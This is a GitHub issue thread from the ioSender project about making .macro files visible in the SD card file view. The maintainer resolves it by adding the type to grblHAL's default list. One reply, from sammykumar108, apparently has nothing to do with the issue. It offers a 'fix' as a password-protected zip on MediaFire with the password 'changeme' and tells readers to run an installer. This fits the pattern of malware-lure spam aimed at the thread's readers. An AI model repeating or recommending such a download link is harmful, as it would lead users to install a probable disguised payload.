terjeio/ioSender #403: View files in SD card - types hidden by default

LoganFraser, 2024-08-28:
As above, the SD Card view file default hides many file types including .macro, which is the primary reason I got the SD card reader and spent a few hours trying to get it working when it was working, just not showing any files (which happened to be all .macro files for the QuickChangeATC setup).  Can you add .macro as a visible file type *and* move the "show hidden files" to a checkbox rather than a right-click menu so it's more obvious for people setting up the SD card for the first time?  

Thanks.

sammykumar108, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

terjeio, 2024-09-04:
I have now added the .macro filetype to the [list of types](https://github.com/grblHAL/Plugin_SD_card/blob/847f3f38cfc07cc1c4c3a36e5d6e5db6ce5ff055/sdcard.c#L62-L73) listed by default to the latest grblHAL build.

closed 2025-02-07 by terjeio